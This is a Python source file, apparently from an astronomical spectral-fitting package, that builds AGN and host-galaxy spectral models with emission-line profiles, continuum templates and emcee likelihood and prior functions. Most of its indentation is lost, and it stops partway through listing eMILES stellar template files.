# To relax a constraint, simply comment out the condition (*not recommended*).
def lnprior(params,param_names,bounds,soft_cons,comp_options):
"""
Log-prior function.
"""
	# Create reference dictionary of parameter values for numexpr
pdict = {}
for k in range(0,len(param_names),1):
pdict[param_names[k]] = params[k]
# Loop through parameters
lp_arr = []
for i in range(len(params)):
# if prior_types[i]=="gaussian":
# mu, sigma = bounds[i]
# lp_arr.append(-0.5 * ((params[i] - mu) / sigma)**2 - 0.5 * np.log(sigma**2 * 2 * np.pi))
# elif prior_types[i]=="uniform":
lower, upper = bounds[i]
assert upper > lower
if lower <= params[i] <= upper:
# lp_arr.append(-1 * np.log(upper - lower))
lp_arr.append(0.0)
else:
lp_arr.append(-np.inf)
# Loop through soft constraints
for i in range(len(soft_cons)):
if (ne.evaluate(soft_cons[i][0],local_dict = pdict).item()-ne.evaluate(soft_cons[i][1],local_dict = pdict).item() >= 0):
lp_arr.append(0.0)
else:
lp_arr.append(-np.inf)
return np.sum(lp_arr)
##################################################################################
def lnprob(params,
param_names,
bounds,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
fit_stat,
velscale,
run_dir):
"""
Log-probability function.
"""
# lnprob (params,args)
fit_type = 'final'
output_model = False
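	# lnlike() returns the log-likelihood along with "blobs" (fluxes, equivalent widths,
	# continuum fluxes, and integrated velocities/dispersions) that emcee stores with each sample.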
ll, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob = lnlike(params,
param_names,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
lp = lnprior(params,param_names,bounds,soft_cons,comp_options)
if not np.isfinite(lp):
return -np.inf, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob, ll
	else:
return lp + ll, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob, ll
####################################################################################
def line_constructor(lam_gal,free_dict,comp_dict,comp_options,line,line_list,velscale,noise):
"""
Constructs an emission line given a line_list, and returns an updated component
dictionary that includes the generated line.
"""
# Gaussian
if (line_list[line]["line_profile"]=="G"): # Gaussian line profile
#
if (isinstance(line_list[line]["amp"],(str))) and (line_list[line]["amp"]!="free"):
amp = ne.evaluate(line_list[line]["amp"],local_dict = free_dict).item()
else:
amp = free_dict[line+"_AMP"]
if (isinstance(line_list[line]["fwhm"],(str))) and (line_list[line]["fwhm"]!="free"):
fwhm = ne.evaluate(line_list[line]["fwhm"],local_dict = free_dict).item()
else:
fwhm = free_dict[line+"_FWHM"]
if (isinstance(line_list[line]["voff"],(str))) and (line_list[line]["voff"]!="free"):
voff = ne.evaluate(line_list[line]["voff"],local_dict = free_dict).item()
else:
voff = free_dict[line+"_VOFF"]
if ~np.isfinite(amp) : amp = 0.0
if ~np.isfinite(fwhm): fwhm = 100.0
if ~np.isfinite(voff): voff = 0.0
line_model = gaussian_line_profile(lam_gal,
line_list[line]["center"],
amp,
fwhm,
voff,
line_list[line]["center_pix"],
line_list[line]["fwhm_res_kms"],
velscale
)
line_model[~np.isfinite(line_model)] = 0.0
comp_dict[line] = line_model
elif (line_list[line]["line_profile"]=="L"): # Lorentzian line profile
if (isinstance(line_list[line]["amp"],(str))) and (line_list[line]["amp"]!="free"):
amp = ne.evaluate(line_list[line]["amp"],local_dict = free_dict).item()
else:
amp = free_dict[line+"_AMP"]
if (isinstance(line_list[line]["fwhm"],(str))) and (line_list[line]["fwhm"]!="free"):
fwhm = ne.evaluate(line_list[line]["fwhm"],local_dict = free_dict).item()
else:
fwhm = free_dict[line+"_FWHM"]
if (isinstance(line_list[line]["voff"],(str))) and (line_list[line]["voff"]!="free"):
voff = ne.evaluate(line_list[line]["voff"],local_dict = free_dict).item()
else:
voff = free_dict[line+"_VOFF"]
if ~np.isfinite(amp) : amp = 0.0
if ~np.isfinite(fwhm): fwhm = 100.0
if ~np.isfinite(voff): voff = 0.0
line_model = lorentzian_line_profile(lam_gal,
line_list[line]["center"],
amp,
fwhm,
voff,
line_list[line]["center_pix"],
line_list[line]["fwhm_res_kms"],
velscale,
noise
)
line_model[~np.isfinite(line_model)] = 0.0
comp_dict[line] = line_model
elif (line_list[line]["line_profile"]=="GH"): # Gauss-Hermite line profile
if (isinstance(line_list[line]["amp"],(str))) and (line_list[line]["amp"]!="free"):
amp = ne.evaluate(line_list[line]["amp"],local_dict = free_dict).item()
else:
amp = free_dict[line+"_AMP"]
if (isinstance(line_list[line]["fwhm"],(str))) and (line_list[line]["fwhm"]!="free"):
fwhm = ne.evaluate(line_list[line]["fwhm"],local_dict = free_dict).item()
else:
fwhm = free_dict[line+"_FWHM"]
if (isinstance(line_list[line]["voff"],(str))) and (line_list[line]["voff"]!="free"):
voff = ne.evaluate(line_list[line]["voff"],local_dict = free_dict).item()
else:
voff = free_dict[line+"_VOFF"]
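			# Collect the higher-order Gauss-Hermite moments h3..h(n_moments); like amp/fwhm/voff,
			# each moment can be free or tied via a numexpr expression.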
hmoments = np.empty(comp_options["n_moments"]-2)
if (comp_options["n_moments"]>2):
for i,m in enumerate(range(3,3+(comp_options["n_moments"]-2),1)):
if (isinstance(line_list[line]["h"+str(m)],(str))) and (line_list[line]["h"+str(m)]!="free"):
hl = ne.evaluate(line_list[line]["h"+str(m)],local_dict = free_dict).item()
else:
hl = free_dict[line+"_H"+str(m)]
hmoments[i]=hl
else:
hmoments = None
if ~np.isfinite(amp) : amp = 0.0
if ~np.isfinite(fwhm): fwhm = 100.0
if ~np.isfinite(voff): voff = 0.0
line_model = gauss_hermite_line_profile(lam_gal,
line_list[line]["center"],
amp,
fwhm,
voff,
hmoments,
line_list[line]["center_pix"],
line_list[line]["fwhm_res_kms"],
velscale,
noise
)
line_model[~np.isfinite(line_model)] = 0.0
comp_dict[line] = line_model
elif (line_list[line]["line_profile"]=="V"): # Voigt line profile
if (isinstance(line_list[line]["amp"],(str))) and (line_list[line]["amp"]!="free"):
amp = ne.evaluate(line_list[line]["amp"],local_dict = free_dict).item()
else:
amp = free_dict[line+"_AMP"]
if (isinstance(line_list[line]["fwhm"],(str))) and (line_list[line]["fwhm"]!="free"):
fwhm = ne.evaluate(line_list[line]["fwhm"],local_dict = free_dict).item()
else:
fwhm = free_dict[line+"_FWHM"]
if (isinstance(line_list[line]["voff"],(str))) and (line_list[line]["voff"]!="free"):
voff = ne.evaluate(line_list[line]["voff"],local_dict = free_dict).item()
else:
voff = free_dict[line+"_VOFF"]
if (isinstance(line_list[line]["shape"],(str))) and (line_list[line]["shape"]!="free"):
shape = ne.evaluate(line_list[line]["shape"],local_dict = free_dict).item()
else:
shape = free_dict[line+"_SHAPE"]
if ~np.isfinite(amp) : amp = 0.0
if ~np.isfinite(fwhm): fwhm = 100.0
if ~np.isfinite(voff): voff = 0.0
line_model = voigt_line_profile(lam_gal,
line_list[line]["center"],
amp,
fwhm,
voff,
shape,
line_list[line]["center_pix"],
line_list[line]["fwhm_res_kms"],
velscale,
noise
)
line_model[~np.isfinite(line_model)] = 0.0
comp_dict[line] = line_model
return comp_dict
#### Model Function ##############################################################
def combined_fwhm(lam_gal, full_profile, fwhm_res, velscale ):
"""
	Calculate the FWHM (in km/s) of a combined line profile, corrected for the instrumental resolution.
"""
def lin_interp(x, y, i, half):
return x[i] + (x[i+1] - x[i]) * ((half - y[i]) / (y[i+1] - y[i]))
def half_max_x(x, y):
half = max(y)/2.0
signs = np.sign(np.add(y, -half))
zero_crossings = (signs[0:-2] != signs[1:-1])
zero_crossings_i = np.where(zero_crossings)[0]
if len(zero_crossings_i)==2:
return [lin_interp(x, y, zero_crossings_i[0], half),
lin_interp(x, y, zero_crossings_i[1], half)]
else:
return [0.0, 0.0]
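	# The FWHM is measured numerically: locate the two half-maximum crossings of the combined
	# profile in pixel units, convert to km/s using velscale, and subtract the instrumental
	# FWHM in quadrature.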
hmx = half_max_x(range(len(lam_gal)),full_profile)
fwhm = np.abs(hmx[1]-hmx[0])
fwhm = np.sqrt((fwhm*velscale)**2 - fwhm_res**2)
if ~np.isfinite(fwhm):
fwhm = 0.0
return fwhm
def fit_model(params,
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model):
"""
Constructs galaxy model.
"""
# Construct dictionary of parameter names and their respective parameter values
# param_names = [param_dict[key]['name'] for key in param_dict ]
# params = [param_dict[key]['init'] for key in param_dict ]
keys = param_names
values = params
p = dict(zip(keys, values))
c = 299792.458 # speed of light
host_model = np.copy(galaxy)
# Initialize empty dict to store model components
comp_dict = {}
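	# Each model component generated below is stored in comp_dict; most components are subtracted
	# from host_model so that the host/stellar templates are fit only to the remaining flux
	# (the polynomial components are instead applied directly to host_model).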
############################# Power-law Component ######################################################
if (comp_options['fit_power']==True) & (power_options['type']=='simple'):
# Create a template model for the power-law continuum
# power = simple_power_law(lam_gal,p['POWER_AMP'],p['POWER_SLOPE'],p['POWER_BREAK']) #
power = simple_power_law(lam_gal,p['POWER_AMP'],p['POWER_SLOPE']) #
host_model = (host_model) - (power) # Subtract off continuum from galaxy, since we only want template weights to be fit
comp_dict['POWER'] = power
elif (comp_options['fit_power']==True) & (power_options['type']=='broken'):
# Create a template model for the power-law continuum
# power = simple_power_law(lam_gal,p['POWER_AMP'],p['POWER_SLOPE'],p['POWER_BREAK']) #
power = broken_power_law(lam_gal,p['POWER_AMP'],p['POWER_BREAK'],
p['POWER_SLOPE_1'],p['POWER_SLOPE_2'],
p['POWER_CURVATURE'])
host_model = (host_model) - (power) # Subtract off continuum from galaxy, since we only want template weights to be fit
comp_dict['POWER'] = power
########################################################################################################
############################# Polynomial Components ####################################################
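	# Polynomials are evaluated on the wavelength grid rescaled to [-1, 1]: "ppoly" is an ordinary
	# polynomial (shifted to be non-negative), "apoly" an additive Legendre polynomial, and "mpoly"
	# a multiplicative Legendre polynomial; the first two are added to the running host model and
	# the last multiplies it.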
if (comp_options["fit_poly"]==True) & (poly_options["ppoly"]["bool"]==True) & (poly_options["ppoly"]["order"]>=0):
#
nw = np.linspace(-1,1,len(lam_gal))
coeff = np.empty(poly_options['ppoly']['order']+1)
for n in range(poly_options['ppoly']['order']+1):
coeff[n] = p["PPOLY_COEFF_%d" % n]
ppoly = np.polynomial.polynomial.polyval(nw, coeff)
		if np.any(ppoly<0):
			ppoly += -np.nanmin(ppoly)
comp_dict["PPOLY"] = ppoly
host_model += ppoly
#
if (comp_options["fit_poly"]==True) & (poly_options["apoly"]["bool"]==True) & (poly_options["apoly"]["order"]>=0):
#
nw = np.linspace(-1,1,len(lam_gal))
coeff = np.empty(poly_options['apoly']['order']+1)
for n in range(poly_options['apoly']['order']+1):
coeff[n] = p["APOLY_COEFF_%d" % n]
apoly = np.polynomial.legendre.legval(nw, coeff)
comp_dict["APOLY"] = apoly
host_model += apoly
#
if (comp_options["fit_poly"]==True) & (poly_options["mpoly"]["bool"]==True) & (poly_options["mpoly"]["order"]>=0):
#
nw = np.linspace(-1,1,len(lam_gal))
coeff = np.empty(poly_options['mpoly']['order']+1)
for n in range(poly_options['mpoly']['order']+1):
coeff[n] = p["MPOLY_COEFF_%d" % n]
mpoly = np.polynomial.legendre.legval(nw, coeff)
comp_dict["MPOLY"] = mpoly
host_model *= mpoly
#
########################################################################################################
############################# Optical FeII Component ###################################################
if (opt_feii_templates is not None):
if (opt_feii_options['opt_template']['type']=='VC04'):
br_opt_feii_template, na_opt_feii_template = VC04_opt_feii_template(p, lam_gal, opt_feii_templates, opt_feii_options, velscale)
host_model = (host_model) - (na_opt_feii_template) - (br_opt_feii_template)
comp_dict['NA_OPT_FEII_TEMPLATE'] = na_opt_feii_template # Add to component dictionary
comp_dict['BR_OPT_FEII_TEMPLATE'] = br_opt_feii_template # Add to component dictionary
elif (opt_feii_options['opt_template']['type']=='K10'):
f_template, s_template, g_template, z_template = K10_opt_feii_template(p, lam_gal, opt_feii_templates, opt_feii_options, velscale)
host_model = (host_model) - (f_template) - (s_template) - (g_template) - (z_template)
comp_dict['F_OPT_FEII_TEMPLATE'] = f_template
comp_dict['S_OPT_FEII_TEMPLATE'] = s_template
comp_dict['G_OPT_FEII_TEMPLATE'] = g_template
comp_dict['Z_OPT_FEII_TEMPLATE'] = z_template
########################################################################################################
############################# UV Iron Component ##########################################################
if (uv_iron_template is not None):
uv_iron_template = VW01_uv_iron_template(lam_gal, p, uv_iron_template, uv_iron_options, velscale, run_dir)
host_model = (host_model) - (uv_iron_template)
comp_dict['UV_IRON_TEMPLATE'] = uv_iron_template
########################################################################################################
############################# Balmer Continuum Component ###############################################
if (balmer_template is not None):
# Unpack Balmer template
lam_balmer, spec_high_balmer, velscale_balmer = balmer_template
# Parse Balmer options
if (balmer_options['R_const']['bool']==False):
balmer_ratio = p['BALMER_RATIO']
elif (balmer_options['R_const']['bool']==True):
balmer_ratio = balmer_options['R_const']['R_val']
if (balmer_options['balmer_amp_const']['bool']==False):
balmer_amp = p['BALMER_AMP']
elif (balmer_options['balmer_amp_const']['bool']==True):
balmer_amp = balmer_options['balmer_amp_const']['balmer_amp_val']
if (balmer_options['balmer_fwhm_const']['bool']==False):
balmer_fwhm = p['BALMER_FWHM']
elif (balmer_options['balmer_fwhm_const']['bool']==True):
balmer_fwhm = balmer_options['balmer_fwhm_const']['balmer_fwhm_val']
if (balmer_options['balmer_voff_const']['bool']==False):
balmer_voff = p['BALMER_VOFF']
elif (balmer_options['balmer_voff_const']['bool']==True):
balmer_voff = balmer_options['balmer_voff_const']['balmer_voff_val']
if (balmer_options['Teff_const']['bool']==False):
balmer_Teff = p['BALMER_TEFF']
elif (balmer_options['Teff_const']['bool']==True):
balmer_Teff = balmer_options['Teff_const']['Teff_val']
if (balmer_options['tau_const']['bool']==False):
balmer_tau = p['BALMER_TAU']
elif (balmer_options['tau_const']['bool']==True):
balmer_tau = balmer_options['tau_const']['tau_val']
balmer_cont = generate_balmer_continuum(lam_gal,lam_balmer, spec_high_balmer, velscale_balmer,
balmer_ratio, balmer_amp, balmer_fwhm, balmer_voff, balmer_Teff, balmer_tau)
host_model = (host_model) - (balmer_cont)
comp_dict['BALMER_CONT'] = balmer_cont
########################################################################################################
############################# Emission Line Components #################################################
# Iteratively generate lines from the line list using the line_constructor()
for line in line_list:
comp_dict = line_constructor(lam_gal,p,comp_dict,comp_options,line,line_list,velscale,noise)
host_model = host_model - comp_dict[line]
########################################################################################################
############################# Host-galaxy Component ######################################################
if (comp_options["fit_host"]==True):
#
if (host_options["vel_const"]["bool"]==True) & (host_options["disp_const"]["bool"]==True):
# If both velocity and dispersion are constant, the host template(s) are pre-convolved
# and the only thing left to do is to scale (or perform nnls for multiple templates)
conv_host = host_template
#
if np.shape(conv_host)[1]==1:
# conv_host = conv_host/np.median(conv_host) * p["HOST_TEMP_AMP"]
conv_host = conv_host * p["HOST_TEMP_AMP"]
host_galaxy = conv_host.reshape(-1)
elif np.shape(conv_host)[1]>1:
host_model[~np.isfinite(host_model)] = 0
conv_host[~np.isfinite(conv_host)] = 0
# host_norm = np.median(host_model)
# if (host_norm/host_norm!=1):
# host_norm = 1
weights = nnls(conv_host,host_model)#/host_norm) # scipy.optimize Non-negative Least Squares
host_galaxy = (np.sum(weights*conv_host,axis=1)) #* host_norm
#
elif (host_options["vel_const"]["bool"]==False) | (host_options["disp_const"]["bool"]==False):
# If templates velocity OR dispersion are not constant, we need to perform
# the convolution.
ssp_fft, npad, vsyst = host_template
if host_options["vel_const"]["bool"]==False:
host_vel = p["HOST_TEMP_VEL"]
elif host_options["vel_const"]["bool"]==True:
host_vel = host_options["vel_const"]["val"]
#
if host_options["disp_const"]["bool"]==False:
host_disp = p["HOST_TEMP_DISP"]
elif host_options["disp_const"]["bool"]==True:
host_disp = host_options["disp_const"]["val"]
#
conv_host = convolve_gauss_hermite(ssp_fft,npad,float(velscale),\
[host_vel, host_disp],np.shape(lam_gal)[0],velscale_ratio=1,sigma_diff=0,vsyst=vsyst)
#
if np.shape(conv_host)[1]==1:
# conv_host = conv_host/np.median(conv_host) * p["HOST_TEMP_AMP"]
conv_host = conv_host * p["HOST_TEMP_AMP"]
host_galaxy = conv_host.reshape(-1)
			elif np.shape(conv_host)[1]>1:
				host_model[~np.isfinite(host_model)] = 0
				conv_host[~np.isfinite(conv_host)] = 0
				# host_norm = np.median(host_model)
				# if (host_norm/host_norm!=1):
				# 	host_norm = 1
				weights = nnls(conv_host,host_model)#/host_norm) # scipy.optimize Non-negative Least Squares
				host_galaxy = (np.sum(weights*conv_host,axis=1))# * host_norm
host_model = (host_model) - (host_galaxy) # Subtract off continuum from galaxy, since we only want template weights to be fit
comp_dict['HOST_GALAXY'] = host_galaxy
########################################################################################################
############################# LOSVD Component ####################################################
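	# The LOSVD component convolves the stellar templates with a two-moment (Gaussian) LOSVD set by
	# (STEL_VEL, STEL_DISP) or their fixed values, then fits non-negative template weights to the
	# residual host model with nnls.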
if (comp_options["fit_losvd"]==True):
#
if (losvd_options["vel_const"]["bool"]==True) & (losvd_options["disp_const"]["bool"]==True):
# If both velocity and dispersion are constant, the host template(s) are pre-convolved
# and the only thing left to do is to scale (or perform nnls for multiple templates)
conv_temp = stel_templates
# print(np.shape(conv_temp))
# print(np.shape(host_model))
#
host_model[~np.isfinite(host_model)] = 0
conv_temp[~np.isfinite(conv_temp)] = 0
# host_norm = np.median(host_model)
# if (host_norm/host_norm!=1) or (host_norm<1):
# host_norm = 1
weights = nnls(conv_temp,host_model)#/host_norm) # scipy.optimize Non-negative Least Squares
host_galaxy = (np.sum(weights*conv_temp,axis=1)) #* host_norm
# Final scaling to ensure the host galaxy isn't negative anywhere
if np.any(host_galaxy<0):
host_galaxy+= -np.min(host_galaxy)
elif (losvd_options["vel_const"]["bool"]==False) | (losvd_options["disp_const"]["bool"]==False):
# If templates velocity OR dispersion are not constant, we need to perform
# the convolution.
temp_fft, npad, vsyst = stel_templates
if losvd_options["vel_const"]["bool"]==False:
stel_vel = p["STEL_VEL"]
elif losvd_options["vel_const"]["bool"]==True:
stel_vel = losvd_options["vel_const"]["val"]
#
if losvd_options["disp_const"]["bool"]==False:
stel_disp = p["STEL_DISP"]
elif losvd_options["disp_const"]["bool"]==True:
stel_disp = losvd_options["disp_const"]["val"]
#
conv_temp = convolve_gauss_hermite(temp_fft,npad,float(velscale),\
[stel_vel, stel_disp],np.shape(lam_gal)[0],velscale_ratio=1,sigma_diff=0,vsyst=vsyst)
#
host_model[~np.isfinite(host_model)] = 0
conv_temp[~np.isfinite(conv_temp)] = 0
# host_norm = np.median(host_model)
# if (host_norm/host_norm!=1) or (host_norm<1):
# host_norm = 1
weights = nnls(conv_temp,host_model)#/host_norm) # scipy.optimize Non-negative Least Squares
host_galaxy = (np.sum(weights*conv_temp,axis=1)) #* host_norm
#
if np.any(host_galaxy<0):
host_galaxy+= -np.min(host_galaxy)
host_model = (host_model) - (host_galaxy) # Subtract off continuum from galaxy, since we only want template weights to be fit
comp_dict['HOST_GALAXY'] = host_galaxy
########################################################################################################
# The final model
	gmodel = np.sum([comp_dict[d] for d in comp_dict],axis=0)
#########################################################################################################
# Add combined lines to comp_dict
for comb_line in combined_line_list:
comp_dict[comb_line] = np.zeros(len(lam_gal))
for indiv_line in combined_line_list[comb_line]["lines"]:
comp_dict[comb_line]+=comp_dict[indiv_line]
line_list = {**line_list, **combined_line_list}
#########################################################################################################
# Add last components to comp_dict for plotting purposes
# Add galaxy, sigma, model, and residuals to comp_dict
comp_dict["DATA"] = galaxy
comp_dict["WAVE"] = lam_gal
comp_dict["NOISE"] = noise
comp_dict["MODEL"] = gmodel
comp_dict["RESID"] = galaxy-gmodel
########################## Fluxes & Equivalent Widths ###################################################
# Equivalent widths of emission lines are stored in a dictionary and returned to emcee as metadata blob.
# Velocity interpolation function
interp_ftn = interp1d(lam_gal,np.arange(len(lam_gal))*velscale,bounds_error=False)
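	# interp_ftn maps observed wavelength onto a velocity scale (pixel index * velscale, in km/s);
	# it is used below to center the velocity grid on each emission line.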
if (fit_type=='final') and (output_model==False):
# Create a single continuum component based on what was fit
total_cont = np.zeros(len(lam_gal))
agn_cont = np.zeros(len(lam_gal))
host_cont = np.zeros(len(lam_gal))
for key in comp_dict:
if key in ["POWER","HOST_GALAXY","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
total_cont+=comp_dict[key]
if key in ["POWER","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
agn_cont+=comp_dict[key]
if key in ["HOST_GALAXY", "PPOLY", "APOLY", "MPOLY"]:
host_cont+=comp_dict[key]
# Get all spectral components, not including data, model, resid, and noise
spec_comps = [i for i in comp_dict if i not in ["DATA","MODEL","WAVE","RESID","NOISE","POWER","HOST_GALAXY","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]]
# Get keys of any lines that were fit for which we will compute eq. widths for
lines = [line for line in line_list]
fluxes = {}
eqwidths = {}
int_vel_disp = {}
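		# For each spectral component, the flux is the integral of the component over wavelength
		# (Simpson's rule) and the equivalent width is the integral of component/total continuum.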
for key in spec_comps:
flux = simps(comp_dict[key],lam_gal)
# add key/value pair to dictionary
fluxes[key+"_FLUX"] = flux
# for line in lines:
if (key in lines):
comp = comp_dict[key]
# if line_list[key]["line_profile"] in ["V","L"]:
# # Truncate the component to zero for any values below the median noise level.
# # This is necessary because the wings of the Voigt and Lorentzian profiles extend to infinity,
# # resulting in unrealistic line dispersions.
# comp[comp < np.nanmedian(noise)] = 0
eqwidth = simps(comp/total_cont,lam_gal)
else:
eqwidth = simps(comp_dict[key]/total_cont,lam_gal)
if ~np.isfinite(eqwidth):
eqwidth=0.0
# Add to eqwidth_dict
eqwidths[key+"_EW"] = eqwidth
#
if (key in lines):
# Calculate integrated velocities and dispersions for each line
# Calculate velocity scale centered on line
vel = np.arange(len(lam_gal))*velscale - interp_ftn(line_list[key]["center"])
full_profile = comp_dict[key]
# Remove stray lines
full_profile = remove_stray_lines(full_profile)
# Normalized line profile
norm_profile = full_profile/np.sum(full_profile)
# Calculate integrated velocity in pixels units
v_int = simps(vel*norm_profile,vel)/simps(norm_profile,vel)
# Calculate integrated dispersion and correct for instrumental dispersion
d_int = np.sqrt(simps(vel**2*norm_profile,vel)/simps(norm_profile,vel) - (v_int**2))
d_int = np.sqrt(d_int**2 - (line_list[key]["fwhm_res_kms"]/2.3548)**2)
if ~np.isfinite(d_int): d_int = 0.0
if ~np.isfinite(v_int): v_int = 0.0
int_vel_disp[key+"_DISP"] = d_int
int_vel_disp[key+"_VINT"] = v_int
# Calculate integrated FWHM for combined lines
if (key in combined_line_list):
comb_fwhm = combined_fwhm(lam_gal,comp_dict[key],line_list[key]["fwhm_res_kms"],velscale)
int_vel_disp[key+"_FWHM"] = comb_fwhm
# Continuum fluxes (to obtain continuum luminosities)
cont_fluxes = {}
#
interp_tot = interp1d(lam_gal,total_cont,kind='linear',bounds_error=False,fill_value=0.0)
interp_agn = interp1d(lam_gal,agn_cont ,kind='linear',bounds_error=False,fill_value=0.0)
interp_host = interp1d(lam_gal,host_cont ,kind='linear',bounds_error=False,fill_value=0.0)
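		# Continuum fluxes are interpolated at fixed wavelengths (1350, 3000, 5100 A), and host/AGN
		# fractions at 4000 and 7000 A, whenever those wavelengths fall within the fitting region.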
if (lam_gal[0]<1350) & (lam_gal[-1]>1350):
cont_fluxes["F_CONT_TOT_1350"] = interp_tot(1350.0) #total_cont[find_nearest(lam_gal,1350.0)[1]]#
cont_fluxes["F_CONT_AGN_1350"] = interp_agn(1350.0) #agn_cont[find_nearest(lam_gal,1350.0)[1]] #
cont_fluxes["F_CONT_HOST_1350"] = interp_host(1350.0) #host_cont[find_nearest(lam_gal,1350.0)[1]] #
if (lam_gal[0]<3000) & (lam_gal[-1]>3000):
cont_fluxes["F_CONT_TOT_3000"] = interp_tot(3000.0) #total_cont[find_nearest(lam_gal,3000.0)[1]]
cont_fluxes["F_CONT_AGN_3000"] = interp_agn(3000.0) #agn_cont[find_nearest(lam_gal,3000.0)[1]]
cont_fluxes["F_CONT_HOST_3000"] = interp_host(3000.0) #host_cont[find_nearest(lam_gal,3000.0)[1]]
if (lam_gal[0]<5100) & (lam_gal[-1]>5100):
cont_fluxes["F_CONT_TOT_5100"] = interp_tot(5100.0) #total_cont[find_nearest(lam_gal,5100.0)[1]]#
cont_fluxes["F_CONT_AGN_5100"] = interp_agn(5100.0) #agn_cont[find_nearest(lam_gal,5100.0)[1]] #
cont_fluxes["F_CONT_HOST_5100"] = interp_host(5100.0) #host_cont[find_nearest(lam_gal,5100.0)[1]] #
if (lam_gal[0]<4000) & (lam_gal[-1]>4000):
cont_fluxes["HOST_FRAC_4000"] = interp_host(4000.0)/interp_tot(4000.0) #host_cont[find_nearest(lam_gal,4000.0)[1]]/total_cont[find_nearest(lam_gal,4000.0)[1]]#
cont_fluxes["AGN_FRAC_4000"] = interp_agn(4000.0)/interp_tot(4000.0) #agn_cont[find_nearest(lam_gal,4000.0)[1]]/total_cont[find_nearest(lam_gal,4000.0)[1]] #
if (lam_gal[0]<7000) & (lam_gal[-1]>7000):
cont_fluxes["HOST_FRAC_7000"] = interp_host(7000.0)/interp_tot(7000.0) #host_cont[find_nearest(lam_gal,7000.0)[1]]/total_cont[find_nearest(lam_gal,7000.0)[1]]#
cont_fluxes["AGN_FRAC_7000"] = interp_agn(7000.0)/interp_tot(7000.0) #agn_cont[find_nearest(lam_gal,7000.0)[1]]/total_cont[find_nearest(lam_gal,7000.0)[1]] #
#
########################################################################################################
if (fit_type=='init') and (output_model==False): # For max. likelihood fitting
return gmodel, comp_dict
if (fit_type=='init') and (output_model==True): # For max. likelihood fitting
return comp_dict
elif (fit_type=='line_test'):
return comp_dict
elif (fit_type=='final') and (output_model==False): # For emcee
return gmodel, fluxes, eqwidths, cont_fluxes, int_vel_disp
elif (fit_type=='final') and (output_model==True): # output all models for best-fit model
return comp_dict
########################################################################################################
#### Host-Galaxy Template##############################################################################
def generate_host_template(lam_gal,host_options,fwhm_gal,fit_mask,velscale,verbose=True):
"""
"""
	ages = np.array([0.09, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0,
					 9.0, 10.0, 11.0, 12.0, 13.0, 14.0],dtype=float)
temp = ["badass_data_files/eMILES/Eku1.30Zp0.06T00.0900_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.1000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.2000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.3000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.4000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.5000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.6000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.7000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.8000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.9000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T01.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T02.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T03.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T04.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T05.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T06.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T07.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T08.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T09.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T10.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T11.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T12.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T13.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T14.0000_iTp0.00_baseFe_linear_FWHM_variable.fits"
]
#
